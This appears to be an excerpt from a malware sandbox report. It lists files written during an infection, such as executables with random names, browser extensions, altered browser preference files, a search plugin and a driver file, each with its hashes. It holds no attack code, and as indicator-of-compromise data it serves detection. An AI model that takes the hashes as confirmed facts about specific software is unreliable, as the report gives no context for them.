C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon16.png

MD5 b307bd8d7f1320589cac448aa70ddc50
SHA1 aaed2bfa8275564ae9b1307fa2f47506c1f6eccf
SHA256 61b02a1fca992be08f1a3df547b29b424767d94702e4d99129c2f1ca2e67a113
SHA512 74883fec0c94233231d17461f36e9a5e99cd4e8c2726a918519a8025cb75aaaab92a8dee612470cc4e3cc361fc0c12f5778e016b1570792ac3f4bf0b3bcfb103

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\icon128.png

MD5 77fbb02714eb199614d1b017bf9b3270
SHA1 48149bbf82d472c5cc5839c3623ee6f2e6df7c42
SHA256 2f5282c25c8829a21a79a120e3b097e5316ddbd0f866508b82e38766c7844dba
SHA512 ff5078d585a1ab3bd4e36e29411376537650acbcb937fdad9ac485a9dd7bcb0f593cc76672572a465eb79894ab6b2eddd6a3da21c165ab75c90df020d3e42823

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\icons\ficon128.png

MD5 d2cec80b28b9be2e46d12cfcbcbd3a52
SHA1 2fdac2e9a2909cfdca5df717dcc36a9d0ca8396a
SHA256 6d38e0be2e6c189de3e4d739bae9986ee365a33baf99a9234e5c9effb44b791a
SHA512 89798889d41cfc687a31c820aea487722b04ea40f7fd07ce899a0e215b7b1703380188ba103825a4b863f8cbca76430bfc437705630f0bfcaffd50a78c2bb295

C:\Users\Admin\AppData\Local\Temp\MSI698C.tmp

MD5 b77a2a2768b9cc78a71bbffb9812b978
SHA1 b70e27eb446fe1c3bc8ea03dabbee2739a782e04
SHA256 f74c97b1a53541b059d3bfafe41a79005ce5065f8210d7de9f1b600dc4e28aa0
SHA512 a8b16bc60f8559c78c64ca9e85cd7fd704bba1f55b362465b7accef1bb853d1c9616995a35f972256c57fbe877ce880398ba1fbceaa658604883aa12dcbc4f57

C:\Windows\Installer\e77693e.msi

MD5 ef8eea150f0de59014583490e6650aaa
SHA1 f99aac1f48dfcdc26c9a43908d35c7c0a6fff753
SHA256 4bb6d91c086fe65489d59e7cb24912ac75b2c90b249c39e1d177875debb14b72
SHA512 d52a03486d10ec84c461bb8dbe341317f40360431c73a848a05492d3cca924d381bf72f14db30bf529bc04a6ca7b2d1afb6b9382277dea044ac69bfb51fcc0f6

C:\Config.Msi\e77693f.rbs

MD5 6b38ae668302dacb5901f7dd0bd5917d
SHA1 e91322c02a6e4cea80bfa36101f32ae3f3546195
SHA256 33d24eabda05975a272a8516739a021d77b9cf04e8971e18e49c52f3cff669d0
SHA512 19f7b0aae0a0ba55e42058a1cea2e17f2a72aa182e01b242f85e52a1a92243d81652fae4da050632940432d76e856cc22c3410611bce27c8880ca4eb51638eb8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 d86ce862606142d5d8a2ec13af2a01ff
SHA1 63a47090aa46b2140e7b3f71ef3cb8fe9fd0a88e
SHA256 d10055da439974aad741e5e3ab68cc4373c10cce5a84db583b95a3076df221f5
SHA512 3e3ff24ae5fb2f4721c432038a735f5531a1b2e2ed99b966ddc4dcae1a19314e9715ed0701b396fdc93d1097fde6feee14070fada2f60d3833caf8d140e48a71

C:\Users\Admin\Pictures\Minor Policy\RhwVucx_hnfus1wIDk6oQaJz.exe

MD5 a00f995b9238c586da0f0d1d0860ce3b
SHA1 21fe5ac365aff0c40d41a1e749cd677f3570ffc7
SHA256 4615d3df04355656e54b472363a913468f5596946d9864c146ead046f45718c8
SHA512 9edb263b2f4d52c6958ac509e837be763f987db27fb00305fac5f92a232dc4daea20dc1ee6a7bcffcea35a5f7e8c6043d1d98556e1d59861d6b5827b45a30c5a

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3zxqty5.default-release\searchplugins\cdnsearch.xml

MD5 2869f887319d49175ff94ec01e707508
SHA1 e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA256 49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA512 63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 db73a4523076f304f6e2a167f74815c6
SHA1 5fbac11d46f042affe533305baacab71618d27e2
SHA256 6440bb438570f0958fe63594227275804935c0f9ef66dcc71e42c00a02821235
SHA512 d28ebf145ed1c5b1285efdd7c1bcc82b9ef453cff8cb8047a71a850f3dc431f43398de0b5529ae96b726e979fdd2b2fb734b7387ec4434bb7d0e7c46789e113b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0ba169c03bc268f28a7f4dd97f243bde
SHA1 7350e14d8cbf967914bf3b3446c8c87807a66ebc
SHA256 290589cab4afe13ad1b6cbca27a6249d444cf32b494bc96dbffa978f0427c9e2
SHA512 17f9f08321d94a8a2b839787cf087ea6aa94636f9cf8f0adb72a3d1309fd8b77f03268ab36c7c959e9ed27f497c6251b5ea6ba68c1eff5d5a39398e51dab161e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8485edab977d7ad78f522f36b6958b78
SHA1 6e6cd45d593b2054daf057fccffe20ca61b14bfb
SHA256 7b4f09a32917234a10b9a5ee2741d46c2c93a36c46b6d21485b2449de5be11a0
SHA512 653378cf331b8879e2b80ea6a2c02ec39b3f1e6eb28f96f84efa16736ea94d44bd86b18d5b1c37e77c1e58bc43474a3d32908731cdfc3f16419c0b09f3714bb9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 398cbf54414ee47e30a6841186893753
SHA1 070a5d8251efc0cd54c041b031ac060a368d63c8
SHA256 9fe6b0717d719574cabf3f53debfa7d150307ffd98bd12ea70c50ebe56fce212
SHA512 bbdbd2a4a018bcde523daeb79bf1fe2f29b0f8b644cac623650d130e86f7493bf81481e9d48f05c36755f625ea4ad867c27be61a96960cd8796fe6c83761a9ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

MD5 838a7b32aefb618130392bc7d006aa2e
SHA1 5159e0f18c9e68f0e75e2239875aa994847b8290
SHA256 ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa
SHA512 9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5f2d1864a8114fe1a4c758ca209bb85e
SHA1 770bf22b67cf26256bd83024775b7cfd31d38a46
SHA256 a803247212255c6aa886835f98dc60d97081afb9e4b76f913b00c30b8d325e9b
SHA512 2486313f6599ac0c3b52750f192e430fd2ee9aba2854c97e6577b912cfedd63291ff8b0323b7dcd0266ba2a773723f42c71658973e128f89de993e80db877bdb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 5d9ec59f6f1ddaf55aa982a77146d49f
SHA1 3f8e101566bd166d9e67ae83521dc0f6db3c73d6
SHA256 dd7a098a43c9dc1ee97d73bef29909def0fe3e90ac9f35e410fb54d1a41a0e21
SHA512 88a4d65b5cab12fc58e4b811dadd94ccbd41335e3b7f4efea64a59c94455dd160fe8c35e22c01e471901ead5a476a1e7a685c3d6c6dc3380b33dced3802cd689

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 cc9a339cea8fc07f1d57d60d2ce2679c
SHA1 dc8308045a9f212da0947123eb2c00105a00ee07
SHA256 0f9bb441c82c226257fe6f0a371c57d9c09d3c7a29f6d4398515f151fcdac542
SHA512 1e9a6978d8021e673fd43c437aa13110f4adba59caefda681368063b0b194627639751fd0bdc3ba1d87e6e7d997e92be17f52d35fbf4eb191978de4c722e9421

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 b7073e4f1ff1cf13fab70e9f4e401bb6
SHA1 f2647381aa1abedccfd367fb3c49e0dfe1a65c09
SHA256 26f4175f59e0d822ca0355a4fd8b4b52456b41a933847ce8f1fd1714c63414d5
SHA512 735f8f3f326123b6225720cc467bff75bebb525f46f19b0613c6e2043c9946adf14751d92befc95713e80cb6feca6f17e29a41719a2902e08233acce75f2833d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 cea55f59c1aafb939f46549cc065fc54
SHA1 7ed004e3eeff74f87ffac03bb461f71fd34789e3
SHA256 963eaf78669434c299a85d3a739e12bb40b08968ff1bc20182acec25c04781d5
SHA512 b2a9edcc841ad6a8f394438241ebb2b1f3f1504e7190e1bb8399e8afa372cd695e198a23a873908964c9dee985f992575796339bdd8563059fca692672eb9efe

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 208b9e2e56ee7b8cbaf9af2bba37ada9
SHA1 2d46a49ab5b81293d054cf28702259b61ba6e5d9
SHA256 dc508285dd7204ca62642fdcbffda019aced20f5d6b08fff3febe334692fa66c
SHA512 81bff7e5421ba7deef81ef85f435bf9a4997ce4b884af92da5867b2549a8e6ded2b2adc6ecc8bcccca27cc27e83890e14bdf4e61131e802aa462d5e94e8921fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\97d96ac3-8881-4062-83ae-a4bbf2b60b47.tmp

MD5 844c09039d7b5dbf1041b93da17cd63f
SHA1 7f8bed119a5a7c59f9de4b8c33d9acfe09b221f0
SHA256 700d54da045113c0eede95712fcad94a37bb8918f4502ff92b246556ff0c6fb0
SHA512 21a550660694d817e2b745e9c989ac439293b1f259ee1e3d93f34cc7756966b2f62985f5e93f62eb1f1eedf60c3b308b6754e565e076913794945d296371fb74

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 b9225de4562098bbc536acf7d6741057
SHA1 58974a102b3e8a55cf1b0f476c5584331ab7e335
SHA256 a9afd1cf37b1654569adf54e84e425f194b348413b9a053ef58d4795c591bf91
SHA512 a8ef5ba3e86f72e9c67ca32cd62b135d7f71054d9bc805d893cd6f2126c66f61969f16895444f316c00228dc1eaec69e49749ad2379e64921ce6dab08a2b6e50

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 42703d67183e29f19eaabc7e7e56c4ef
SHA1 651ddd7faaea2e6893c4a128a8e8da6734e5c1d4
SHA256 b409b0899043bcd932b99c8bbf5011e72d66efec28a29c6bbf4a0ea3fea9392e
SHA512 dbdaa64b056d60e124d5aea492ea6921259bbc41698deae1ac2e3114617804201c8dbce43e1bfbc072589bdceccc7ba130bb42578cfd6d2b29b80e517e3cd2a4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 d1ac22d9e21feada04b4bb0f7a4bb8cf
SHA1 995c029fb089eec4a379c582f04709781d105be0
SHA256 feaefc1d3cf09944a28f70ceaf641edfe587c915a440e8566cef57d17dd25430
SHA512 0635d9202f50f6e4a3c260a104afe9e4f430c4cb52b1b8dec6204024234fef8eb382b46df240f1bc942be7b9e9b058622cc7eba7210a1e3501136e758aa82bc2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe7854c6.TMP

MD5 1a94eda1b298c9600e057c201c200288
SHA1 6e26431a10d248e3835d18cf14fe7309aa7edf33
SHA256 485bcf81db6fa33eb84cad44098e4e4f26cb5b75acc84b47827215eee339091b
SHA512 e8d7745a6ca984361453a11c543d188451f3bc84bb24edb2b5ab3d14a3f963fff31d51e5fbd6970238995157aae7b9daff343e064429e41139921b0864e08baf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 b32626dd51e7f030f67a8cf9d48d851a
SHA1 4f0b154da6acfb4e74ed63b71efb880cfa18cf0a
SHA256 38e1854a2d530ce627f1f124cdaf32838cb02be27c2ace1fb67ca1ddde5db9d0
SHA512 d8cdd8993f3ae1688b824ecb3b9a263cb61d1ab32271da6c1bb6f5e773f3abd0c263030d32b66c381523fa1c521c6914d96e971f621c7814858df492250ae065

C:\Users\Admin\Pictures\IO8z5A45eSC7aabRmyEKtvvB.exe

MD5 5bbdba82205d5a5c72eead40bc158371
SHA1 c98d57fb71abbe48669b131fb068216a9291a139
SHA256 be190feba713752a082f764ee462b03656eaa5f01a6ce41f2091de4d37447c66
SHA512 b8027b3566201158ca0aa88eb26b846b82fcbe715cbd6024f4ac0ac196a71a496d3011b61e606ab6dcacdeae16a21a48c76037b272c911ab3a98ce6f72670b29

C:\Users\Admin\AppData\Local\Temp\is-UG8LV.tmp\IO8z5A45eSC7aabRmyEKtvvB.tmp

MD5 f507ce43ea08d1721816ad4b0e090f50
SHA1 e4f02bcd410bddabea4c741838d9a88386547629
SHA256 d2218bde27d66f28e3caf15e899653a9357ebdc7adf9a763b687f6c03c93e5e1
SHA512 37b2f92df632f75447572df840a236ef01021e8291536bf2e8156179333f770afdd8bcbf50cb05bbdbdaa53c00ace46119290800b115823ea035a2389a3f6693

C:\Users\Admin\Pictures\ivdYuQXcdohjbgliBKjXkIfV.exe

MD5 a5454fc91c8aed80474b4a956480486a
SHA1 4af33ccbe7193008afba4200822ee532382029de
SHA256 ff7b3762209bf79758e17af83509138cd3c0e25d83fde88850b945cb740bbcc4
SHA512 88143f22f1cb528649811b1e4f9f0264591a2d55a17eb647a6e04fa1952d1f06249da1cd85b040e14c695c8c7abfc5f7b8532fbab35881a398ade5389548b641

C:\Users\Admin\AppData\Local\Temp\7zS6820.tmp\__data__\config.txt

MD5 89d038145c00ffbf74c534a1bdd27b6b
SHA1 414eb60ca5e8321dac63ef74c4147ddf82bdcf9e
SHA256 91f42c2e7bb144275db6bd22008ed27b73b8d99488a9b872d9142fb9e11f3a01
SHA512 b978f872f49c125fb3f8cb597510ca507f03e3a5b2b764f7fae088b25551b87b4add317316ea15d9ec3017deacaeb43fbe2ed3ba580aeab9bc28d926ee416ae6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 054f5f4902cfafcb1fd23a5cd5002fd1
SHA1 84710d2c9da781897adf89c20e544bdefaf3fa13
SHA256 10523d80d5a9639e9a383d21dadba7bf487bcebf2d3de1c692a483db3a1a881e
SHA512 ad78be92f61f222145137a4608d0cfbd20d1ae086431c3b037c580a2277f4f485a99e1275e7f20ea0530f41c15975ffd6ec4752e8f01a29c98e88c0b7a2d46ab

C:\Program Files (x86)\Common Files\AVILine\is-F7G1R.tmp

MD5 35d76f1c3cd65111a119bc5c24170bea
SHA1 b0982219f443d2fc683d2ba8e9d3fc1f4822e180
SHA256 d762fabb3787fa50d14b38d0b259b667528e0bc6c443e1fd635e855ddefb71d3
SHA512 db86e0b496d04e284a55c427429cb086cf25141858c85aab49ed95276d80e8aae9543d4c1d2af8b810f8f8de2d964f904ca2992f3f1079d0a53ac50604729875

C:\Program Files (x86)\Common Files\AVILine\is-SDT8O.tmp

MD5 9cf9ad67e4eb38a92ce98c24141b665d
SHA1 7dbb8c99b9de4c3d1894853ee39d65ca978716a2
SHA256 01aa9fdf025b98a71f9e1d0fcd825791013ac4a7d24134401cd0f3ea2bad95a3
SHA512 aeadbacc226cde89e67f3a62cb2568b5caa61663b2f3d696252dc94744f62a7928d2ef7a79de0f680ca16ff569fd151abe6d339d24502973f8e4c8b6948b6a72

C:\Program Files (x86)\Common Files\AVILine\UIText\is-P0VMF.tmp

MD5 d27bb9ba4ad61e120e61df31a4c360a2
SHA1 7529afe6af17fb93397682e7da204aadcf23d37c
SHA256 d9944b0e813903e38ad965209a2421ef7699d803a052c6bb775c074546101151
SHA512 54da6ad90ce1acbf9fcaf92a3d2a29bc7e74f3780e77d4410aac44a8c33519d1918380292017be3856791183703f141dcbdc67faab8fd24f7409df7ad5fc0bef

C:\Program Files (x86)\Common Files\AVILine\UIText\is-OAH3R.tmp

MD5 52bc059b64807554fce950eaf03f6742
SHA1 6c46a83b65c3ef4e9a81c626f228ba90140caf7f
SHA256 4031a8feefd2fe5e862104839d15745c97f3fc2647bd98cbcae097713bc304ee
SHA512 3f717db4bf717c562e2828fe027991111bd330897458951aee17265ecba2387f00053b3ab43e7e55eb0910c6b05d0dd6d8121cafb9ecf744427ed8d572e0d51d

C:\Program Files (x86)\Common Files\AVILine\is-QI70V.tmp

MD5 cfbc1a44bc45711196a601e6b3c09bbf
SHA1 aad59d1d94ca8c66f68ab627408546f17d4d530f
SHA256 a0fa2342aa59edea62bd0cdc69e494fd05606e96a20fc81b8cf8a746e27a4686
SHA512 ea21ca9a842941699980f7398f4448075e9c0ef77326890f671bd5e5c404296cbd13d5199ff38fabcdaaf32b0d959e087e2d6d2d39c1148eb54c611f1f3f9c8f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 60e3f691077715586b918375dd23c6b0
SHA1 476d3eab15649c40c6aebfb6ac2366db50283d1b
SHA256 e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee
SHA512 d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

C:\Program Files (x86)\Common Files\AVILine\is-IEQ4S.tmp

MD5 574be5cf3ebf3b225f410200d459003e
SHA1 ff2a3d6acac52fa7edb293bba308b521b15e3a5c
SHA256 a61f44fc0cde3b89d79b76ea2182fffca6a9585ee730aea6349c5a5407250a2d
SHA512 84d498b5c4f0a7016aa853cdf7d82dce57514490885b80220cbd285f6a546d0e6e97b41e32d1b139e4bd138dc6220c7bf32bf432a7e77bc9426e6e868b343644

C:\Program Files (x86)\Common Files\AVILine\is-O4LQH.tmp

MD5 9d5d177a325e4936ae78a6105d5583a9
SHA1 5e55b378ab43435d2de81c45053618b76fd03c23
SHA256 c95fc8fd8b6dc15cd7487b10bd0f23e949857f87774feabcb47955da14e543bb
SHA512 225b47fe5f08d050ca6c17149ebd69227946902c725560120888e29df65f0e5659440b4df0eb838f4c7a0b69ac21392bcc402ff2f58a80b22040d177fe333081

C:\Program Files (x86)\Common Files\AVILine\is-P203M.tmp

MD5 c94b4a9a92647df47962f849c42d91fb
SHA1 a3426e0123a8cd72469a50f0a55100bbe6ffc9dd
SHA256 6b08a4921a930bffbf0ea84d8d6f8257d7bd4d6948678e0a455c363dfbebbb16
SHA512 1e06307e504ce1bdd2c0ff200c47816432ffdffccf550c272f2195f3b001d235fa2c3556713a0d43c1f1f679128b28049d71917ec428628d7c9c985dd2ea0f00

C:\Program Files (x86)\Common Files\AVILine\is-CGVHA.tmp

MD5 4d6d8d64f627853307f8e3fa7e6de73f
SHA1 168146ba18a9d9c3785570ff8616faf6758eb669
SHA256 ff3644e04dbebaf07049e1f25f6ff647ad1ff17715908cb840f3856c6e7e85ac
SHA512 e85b063516f37cc3c16002537aef10325b11459b50d1c8ec580170b5aec2ccf1f79ddd7af6c66eab4a3226d65a2221309884bf9360cdc5b990e030c140c945f2

C:\Program Files (x86)\Common Files\AVILine\is-F6O9M.tmp

MD5 188fc6a8cb8f16946ced03b3e9b3c8b2
SHA1 c07912804602402f006f137d1399c87386706dbf
SHA256 4ebaa643bb403b7313226fe978b0017c35403b6f57b201803fb05bd37d3d4fda
SHA512 5e0002fa5079c972f5536fdcf11232a548591a501fcd0db6ccee7ee269778e7f82588b6863f530d5ad54c0d411b9aab929a2390e07351a81ce33cee03c9cc0ea

C:\Program Files (x86)\Common Files\AVILine\is-LGADA.tmp

MD5 5c192239d54e0e9d4fa75a3f1f84d25f
SHA1 416e9ed35cf0608a494e28c3f6093eafc99b5d2b
SHA256 b9de38dcc42ba5d18b5b1b7248438314c6c7221e22f2a61914f26c0aa9f79270
SHA512 f0042ee17a85906b9672c6b3fb9ef113e23b9f8a0799af6f570b264efd9c50786f222ff9c2bc490120f0e08df111bc0692acdeca64cdecad2f8b6a74b4c95397

C:\Program Files (x86)\Common Files\AVILine\is-60OSU.tmp

MD5 bc32623591608995eaf61c5b8ec80044
SHA1 5000684cdaecb98fb6c2bf063b13aedfb8d7bc80
SHA256 c6d8ecfaf0c01713bf69ceb30f7e3c7e0ba1f09292884d10730c24e13c62b612
SHA512 8594cabb5c3cfa8730a4b65db407e576b0458e6a85d904572eae30d3f3e8b3fbae2a639a1e52001e695272c2b7e899558ce27c3984a7792e33271fba17a3912b

C:\Program Files (x86)\Common Files\AVILine\is-24VB6.tmp

MD5 1b7fb1c58ee3b29763c9f0356a2f5dfc
SHA1 6de507d930eff045db4ebae68c1402059ea96105
SHA256 fa70a865eb72e962562e526a061797fdc184c0ba970d68d07e803b2d21911fc2
SHA512 0b91ad7b7b30351d2554e17e2a626f8ce7d92b96bf6e07ac46b330d36fde92c5a66a222ec8277be93dfbd01fbf743c3ed9022838fd063cb843141afe62462be8

C:\Program Files (x86)\Common Files\AVILine\is-3UB35.tmp

MD5 5f7beb4ce62e2499d2faad252c2fe1cb
SHA1 49eacd6a0fac00d82bd42d7a14888a95cc9bf766
SHA256 fc1dc1ce09b356fc7fa77ef9978749200d8013216fca1e84bb9862401f067d10
SHA512 fb758d2965e66d1ee2ad6649f92799145a1511a2d7658c4f19a74ed0e07516bbf7148ebe9d64f58ab4b5bdf17bca128ed8bf2259feda1331fc63374b4958db48

C:\Program Files (x86)\Common Files\AVILine\is-FKBBD.tmp

MD5 f3226e7f495c3bd8d93d71d970dd72fa
SHA1 51e831b81b8f71cf08b5008db5b645f750fb5f3a
SHA256 fcfdacedd3ebde5c29b8d86c8c9be3394e38ea523cd69885578463c49c319a52
SHA512 33442111560e725f326e21337f57221c14375fd92eed8d5acae0af24ce68b7149a6362fc12e85b48e5d5d8c0304a12022f515743f0c6beb3d9b748f24f2150d4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 843509c8ee2da9354a8e151401921045
SHA1 22c796b81f16657374b0bb2e2eff30460f6ec103
SHA256 4d7b61edabc028474ab354063b8182ab9c80a140522b48a6e3425f9ea99494f5
SHA512 c3a833d0775c6f95cc68b32ec5586e6445a6721a47f385c713653ed7cd8f1440a376563190f1c677c261f68572096e41e7493c2d9003cb8744d6de75ca4c18b0

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Browser

MD5 a397e5983d4a1619e36143b4d804b870
SHA1 aa135a8cc2469cfd1ef2d7955f027d95be5dfbd4
SHA256 9c70f766d3b84fc2bb298efa37cc9191f28bec336329cc11468cfadbc3b137f4
SHA512 4159ea654152d2810c95648694dd71957c84ea825fcca87b36f7e3282a72b30ef741805c610c5fa847ca186e34bde9c289aaa7b6931c5b257f1d11255cd2a816

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 615983eab31115f26447ac39157934bd
SHA1 922f89125302f8a9c9530e6754673291421efdb2
SHA256 e6f9ad85ea53e4251a9133d3ab7b6c7e79926c131162459b62c21c310b70862a
SHA512 a40ead5dd4feb2466b8bcf9bbb679c0d432f06997566069ea8adf9795b5c4ca97e041a90b242b633e447b7926162805b171253ad3ba29389aa2f6ee73ef5b856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 520f49646897c27fcbc7cad332cc70b3
SHA1 3c97668bcb0fb7ea594dd0d56838c8ad2e8a982d
SHA256 5f90d2f3f51cffb0410822ff6c38feb41ea9ab86ce7fd1318432e58881b19bdf
SHA512 e3a544c504ca88a6fd1e5a2cf73fdcbae8c7fd2b70168ae07a06c588c466d54573c695b80842b52d8e0e675c5ec5393c7551eb34b01cf1929183f93df6ea2a29

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 b403a9cc3b31a20a320e93ef61777658
SHA1 98d0f95b1855158cde9f27dad2642cb12810b697
SHA256 4e89f089a12366e1b27aa3cf1b78bfa3fe0b104951e8a15753282141633bf772
SHA512 9b289938676e05ad713e5f708d5741243b5d1513d15e3c7a0b18566450e90d961b9d40fdc4735d234b9e294f07ce6219213ecb2237f93f0777305f3cc446ec0e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe791613.TMP

MD5 53dba49030a1e52d464d5ff5213acdd3
SHA1 ca14c9c9744b9cb1beadc8577547f4119e85b81d
SHA256 aee8f3f4040c90589f955089bee96c4b2b6ec5ff64e096b390dabcf8473bec32
SHA512 1ddfb0238636d5d44d4c3693b207ad4fa780616f586341c81bdf424fd432f963e850626dec79704b3d75bfa7fb4385469bbea00631c2ce9e252197686c9b88f3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 8c485180adce0af814ac0fa1caf5a788
SHA1 3814b0483a6c837cd7bb0bae7c4cf82c17c0b144
SHA256 ca797d33572bd067b586fa4d57a8334dd36675532e6cb2a2362bb7449003b43e
SHA512 6efb136b314987cd5042f920a12f33f9acdc90bde9c030e41ce572cc67f9bd0eb4c39353efe2d3ec38dc731090e4fa9f861d372c57b6f99cb784171b29658cb8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 5395081e4d1b864f58855d836989e2d6
SHA1 c14697b2c7a50babdd41f273fce6467051ecf496
SHA256 0908a7faf877cb78c7137482f5252b4b4d51961cb6907f19f13f776f55dbe8a5
SHA512 75c8bb20a0b0b55bfa8b26cb6fc5b887129ff52bebe2c215283638a0e895962583258c4e6c94f943d72160cd27bd0d57fc9d1c23a38cf1e3e3d414b29cc01167

C:\Windows\Temp\tlxvacrdjkek.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Windows\Temp\icqgdmrkohjc.sys

MD5 0c0195c48b6b8582fa6f6373032118da
SHA1 d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA256 11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512 ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json

MD5 1c5bbf5ca8c9bc1055cd4ee4e0a386b7
SHA1 9c2496c8e91337743e096b6ddded00b648c5f8c1
SHA256 74cbbe676f5c6b1aef24c6e7fbc853277f7b0efc853b5fe88f0ae1dffb344e93
SHA512 d089c3fad71210f7717c77c67b9f47796f27d47965f9cb682c2a9f819e0075b686db9c7b616baf94cc262a45f96cd7c4c40cb47db35716baeea04ef462fd8fad

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\en_BS\messages.json

MD5 b68ef8f2e0fa61689b94e1e4d2f5acf3
SHA1 5e56d6dffaf84bfc3c7345232a9b339a7238e524
SHA256 3b6e7fde620bb0e4309b6b2233788930e8616319e4e7ae09725d4b0d069e4503
SHA512 d588ce7f4c86e97e6bb90f99977e00e1d5aa44ca8df826bc3fab8400567a511a7e512cb2a9d48ae747b3892190eb79269f10ed30c5ab0b673dbb3ade9409c6d5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 782bb4ba85c06c90ae99d609402512dc
SHA1 a72e20215eb32e7ce83bc2da4c8d161c8dc76a5e
SHA256 2708da89a5c6d18c9aa91d96eeedd4aa4def8c51f985ac7f1632300cef6a8621
SHA512 4b34fcd3c76218d81a118dfabda3458168fcf73d19a2ca05b6eb45aba2d638bbf77c635a964b8027db833bf63edbb638e545723826a011f544b967b46077eb52

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2c28fcf552f6dbefaa6a2238893b85ee
SHA1 334c4fcad1648342ca46252800600e489a17ed96
SHA256 9a8c04742fad7db38ed63ee711884e9f99f26f075f5cbce5b45edb7071b45f6c
SHA512 b1b22b50b6765ef4bbf458036b85c846400669979f108230b07ef7c09ef15324f5a62c2bbd2c4b6ba3288950903a7e5a2b93f26d74348519cb164fa7fc81b0dd

C:\Users\Admin\Pictures\9l5Bh508nI37gMzoXaMulhmC.exe

MD5 cff273f9fc0f1988109a610ffd58006b
SHA1 d3a2de28d536909e65f5b4c3fc54d3a4d9865e9a
SHA256 7b94f7b678af30b63c0efb693e3da3a28ae8e985a39a13835a8c2a0ed59b7e61
